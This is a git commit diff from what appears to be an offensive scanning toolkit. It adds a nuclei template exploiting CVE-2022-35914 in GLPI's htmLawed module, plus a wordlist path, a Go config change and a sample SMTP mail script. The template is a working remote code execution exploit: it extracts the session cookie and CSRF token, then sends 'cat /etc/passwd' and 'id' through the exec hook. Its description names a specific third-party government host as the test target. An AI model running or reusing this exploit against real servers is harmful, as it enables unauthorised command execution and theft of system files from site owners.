add CVE-2022-35914 ;change nuclei dir to config 2022-10-08

Author: hktalent

brute/dicts/filedic.txt

@@ -30266,6 +30266,7 @@ phvayv.php
 phvayvv.php
 phymyadmin
 phymyadmin/
+/vendor/htmlawed/htmlawed/htmLawedTest.php
 physican/login.do
 /login.do
 phystech

config/51pwn_poc/CVE-2022-35914.yaml

@@ -0,0 +1,78 @@
+id: CVE-2022-35914_51pwn
+
+info:
+  name: /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.
+  author: 51pwn
+  severity: critical
+  description: |
+    /vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.
+    测试：
+    nuclei -duc -t 51pwn/CVE-2022-35914.yaml -u https://glpi-ubuntu.inti.gob.ar/vendor/htmlawed/htmlawed/htmLawedTest.php
+    
+  reference:
+    - http://www.bioinformatics.org/phplabware/sourceer/sourceer.php?&Sfs=htmLawedTest.php&Sl=.%2Finternal_utilities%2FhtmLawed
+    - https://github.com/glpi-project/glpi/releases
+    - https://glpi-project.org/fr/glpi-10-0-3-disponible/
+  tags: cve2022,RCE,zcs
+
+requests:
+  - raw:
+      - |
+        GET /vendor/htmlawed/htmlawed/htmLawedTest.php/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: close
+       
+      - |
+        POST /vendor/htmlawed/htmlawed/htmLawedTest.php/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: close
+        Cookie: {{cookie}}
+        Content-Length: 88
+        Content-Type: application/x-www-form-urlencoded
+
+        token={{token}}&text=cat /etc/passwd&hhook=exec&{{cookie}}
+      - |
+        POST /vendor/htmlawed/htmlawed/htmLawedTest.php/vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: close
+        Cookie: {{cookie}}
+        Content-Length: 88
+        Content-Type: application/x-www-form-urlencoded
+
+        token={{token}}&text=id&hhook=exec&{{cookie}}
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - uid=\d+\([^\)]+\).*gid=\d+\([^\)]+\).*group
+          - root:x:0:0:root
+        condition: or
+      - type: status
+        status:
+          - 200
+        condition: and
+    extractors:
+      - type: regex
+        part: header
+        name: cookie
+        group: 1
+        internal: true
+        regex:
+          - '(sid=[^;]+)'
+      - type: regex
+        part: body
+        name: token
+        group: 1
+        internal: true
+        regex:
+          - 'id="token" value="([^"]+)'

projectdiscovery/nuclei_Yaml/nuclei_yaml.go

@@ -420,10 +420,12 @@ func readConfig(options *types.Options) {
 
 	options.UpdateNuclei = false
 	options.UpdateTemplates = false
-	options.TemplatesDirectory = pwd + "/config/nuclei-templates"
+	// options.TemplatesDirectory = pwd + "/config/nuclei-templates"
+	options.TemplatesDirectory = pwd + "/config"
 	// 嵌入式集成私人版本nuclei-templates 共3744个YAML POC
 	if util.GetValAsBool("enableEmbedYaml") {
-		options.Templates = []string{pwd + "/config/nuclei-templates"}
+		// options.Templates = []string{pwd + "/config/nuclei-templates"}
+		options.Templates = []string{pwd + "/config"}
 		options.NoUpdateTemplates = true
 	} else {
 		options.NoUpdateTemplates = false

tools/sendmail.go

@@ -0,0 +1,36 @@
+package main
+
+import (
+	"fmt"
+	"net/smtp"
+)
+
+func main() {
+
+	// Sender data.
+	from := "[email protected]"
+	password := "<Email Password>"
+
+	// Receiver email address.
+	to := []string{
+		"[email protected]",
+	}
+
+	// smtp server configuration.
+	smtpHost := "smtp.gmail.com"
+	smtpPort := "587"
+
+	// Message.
+	message := []byte("This is a test email message.")
+
+	// Authentication.
+	auth := smtp.PlainAuth("", from, password, smtpHost)
+
+	// Sending email.
+	err := smtp.SendMail(smtpHost+":"+smtpPort, auth, from, to, message)
+	if err != nil {
+		fmt.Println(err)
+		return
+	}
+	fmt.Println("Email Sent Successfully!")
+}